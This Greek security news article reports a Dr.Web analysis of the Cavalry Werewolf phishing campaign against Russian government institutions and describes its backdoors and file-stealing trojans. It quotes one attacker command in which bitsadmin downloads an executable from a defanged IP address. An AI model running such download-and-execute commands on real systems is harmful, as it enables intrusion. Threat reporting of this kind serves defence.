Τον Ιούλιο του 2025, μια εξελιγμένη ομάδα χάκερ γνωστή ως Cavalry Werewolf εκτέλεσε μια στοχευμένη εκστρατεία κατά ρωσικών κυβερνητικών ιδρυμάτων, παραβιάζοντας κρίσιμες υποδομές μέσω συντονισμένων επιθέσεων phishing.
Δείτε επίσης: Οκτώβριος 2025: Αύξηση επιθέσεων phishing και ransomware

Η ανακάλυψη αυτής της εκστρατείας αποκαλύπτει μια πολύπλοκη αλυσίδα επιθέσεων σχεδιασμένη να καθιερώσει επίμονη πρόσβαση στο δίκτυο, να εξάγει ευαίσθητα δεδομένα και να διατηρεί μακροπρόθεσμο έλεγχο των παραβιασμένων συστημάτων.
Οι αναλυτές ασφαλείας της Dr.Web αναγνώρισαν την ομάδα αφού επικοινώνησε μαζί τους ένας στοχευμένος κυβερνητικός οργανισμός που ανίχνευσε ύποπτη κίνηση email προερχόμενη από εσωτερικούς εταιρικούς λογαριασμούς, υποδεικνύοντας μη εξουσιοδοτημένη πρόσβαση στο δίκτυο.
Η έρευνα αποκάλυψε πολλαπλές άγνωστες προηγουμένως παραλλαγές κακόβουλου λογισμικού που αναπτύχθηκαν σε μια πολυεπίπεδη διαδικασία μόλυνσης. Οι επιτιθέμενοι επέδειξαν εξελιγμένες πρακτικές επιχειρησιακής ασφάλειας χρησιμοποιώντας εργαλεία ανοιχτού κώδικα, εφαρμόζοντας κρυπτογράφηση και καθιερώνοντας υποδομή εντολών και ελέγχου σε πολλαπλούς διακομιστές.
Το οπλοστάσιό τους περιλαμβάνει διάφορα backdoors αντίστροφου shell, trojans κλοπής δεδομένων και τεχνικές έγχυσης διεργασιών που επιτρέπουν την απομακρυσμένη εκτέλεση εντολών χωρίς να ενεργοποιούν παραδοσιακούς μηχανισμούς ασφαλείας.
Οι ερευνητές ασφαλείας της Dr.Web σημείωσαν ότι αυτή η εκστρατεία αντιπροσωπεύει μια σημαντική κλιμάκωση στην πολυπλοκότητα, με την ομάδα να επεκτείνει συνεχώς το εργαλείο της για να προσαρμοστεί σε διαφορετικά περιβάλλοντα στόχων. Η μεθοδολογία επίθεσης επικεντρώνεται στην ανάπτυξη backdoors που καθιερώνουν απομακρυσμένη πρόσβαση shell, επιτρέποντας στους επιτιθέμενους να εκτελούν εντολές και να διατηρούν την επιμονή εντός των παραβιασμένων δικτύων.
Αυτή η προσέγγιση παρέχει την ευελιξία να αναπτύσσονται επιπλέον στάδια κακόβουλου λογισμικού βάσει των ευρημάτων αναγνώρισης εντός κάθε οργανισμού στόχου. Η Cavalry Werewolf ξεκινά επιθέσεις μέσω phishing emails που περιέχουν επικίνδυνα συνημμένα που προσποιούνται επίσημα κυβερνητικά έγγραφα.
Δείτε ακόμα: Νέα επίθεση Phishing εκμεταλλεύεται τις σελίδες Cloudflare και ZenDesk

Το πρωταρχικό στάδιο μόλυνσης, που αναγνωρίζεται ως BackDoor.ShellNET.1, φτάνει σε αρχεία αρχειοθέτησης προστατευμένα με κωδικό πρόσβασης με παραπλανητικά ονόματα αρχείων όπως διοικητικές αναφορές και εσωτερικές επικοινωνίες. Μόλις εκτελεστεί, αυτό το backdoor αντίστροφου shell βασισμένο στο λογισμικό ανοιχτού κώδικα Reverse-Shell-CS επιτρέπει στους επιτιθέμενους να συνδέονται απομακρυσμένα με μολυσμένα συστήματα και να εκτελούν αυθαίρετες εντολές. Μετά την αρχική παραβίαση, οι επιτιθέμενοι αξιοποιούν το νόμιμο εργαλείο των Windows, Bitsadmin, για να κατεβάσουν επιπλέον κακόβουλα φορτία μέσω απομακρυσμένης εκτέλεσης εντολών.
Αυτό αντιπροσωπεύει μια κλασική τεχνική living-off-the-land όπου τα νόμιμα εργαλεία συστήματος γίνονται φορείς ανάπτυξης κακόβουλου λογισμικού. Η σύνταξη εντολών ακολουθεί αυτό το πρότυπο: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/winpot.exe C:\users\public\downloads\winpot.exe.
Αυτή η συγκεκριμένη ακολουθία δείχνει πώς οι επιτιθέμενοι διατηρούν την επιχειρησιακή ασφάλεια χρησιμοποιώντας τυπικούς μηχανισμούς των Windows που συνήθως φαίνονται νόμιμοι στα αρχεία καταγραφής δικτύου. Τα επόμενα στάδια μόλυνσης εισάγουν trojans κλοπής αρχείων όπως το Trojan.FileSpyNET.5, ικανό να εξάγει έγγραφα σε κοινές μορφές, συμπεριλαμβανομένων αρχείων Word, υπολογιστικών φύλλων Excel, PDF και αρχείων εικόνας.
Οι επιτιθέμενοι στη συνέχεια αναπτύσσουν το BackDoor.Tunnel.41, βασισμένο στο λογισμικό ανοιχτού κώδικα ReverseSocks5, το οποίο δημιουργεί σήραγγες SOCKS5 για αθόρυβη απομακρυσμένη πρόσβαση και εκτέλεση εντολών. Αυτή η πολυεπίπεδη προσέγγιση επιτρέπει στην ομάδα να διατηρεί πολλαπλά σημεία πρόσβασης εντός της παραβιασμένης υποδομής, εξασφαλίζοντας την επιμονή ακόμη και αν ανιχνευθούν και αφαιρεθούν μεμονωμένα backdoors.
Η τεχνική πολυπλοκότητα που εμφανίζεται σε όλη την εκστρατεία υπογραμμίζει το εξελισσόμενο τοπίο απειλών που αντιμετωπίζουν οι κυβερνητικοί οργανισμοί.
Δείτε επίσης: Ανατομία ενός phishing email: Πώς να ξεχωρίζεις μια καλοστημένη παγίδα
🔒 Προστατέψτε την ιδιωτικότητά σας με Proton VPN
Ελβετικό VPN από τους δημιουργούς του Proton Mail — αυστηρή πολιτική no-logs, ισχυρή κρυπτογράφηση και ενσωματωμένο NetShield που μπλοκάρει διαφημίσεις, trackers & malware.
- ✔ No-logs, με έδρα την Ελβετία (εκτός 14-Eyes)
- ✔ NetShield: φραγή διαφημίσεων, trackers & κακόβουλων domains
- ✔ Καλύπτει όλες τις συσκευές — δωρεάν έκδοση διαθέσιμη
Ο σύνδεσμος είναι συνεργατικός (affiliate) — το SecNews ενδέχεται να λάβει προμήθεια χωρίς επιπλέον κόστος για εσάς. Δεν επηρεάζει την ανεξαρτησία της αρθρογραφίας μας.

Συνδυάζοντας νόμιμα εργαλεία, πλαίσια ανοιχτού κώδικα και προσαρμοσμένες τροποποιήσεις κακόβουλου λογισμικού, η Cavalry Werewolf επιδεικνύει μια ώριμη επιχειρησιακή ικανότητα σχεδιασμένη να αποφεύγει την ανίχνευση διατηρώντας ευέλικτες δομές εντολών και ελέγχου κατάλληλες για διαφορετικά περιβάλλοντα στόχων.
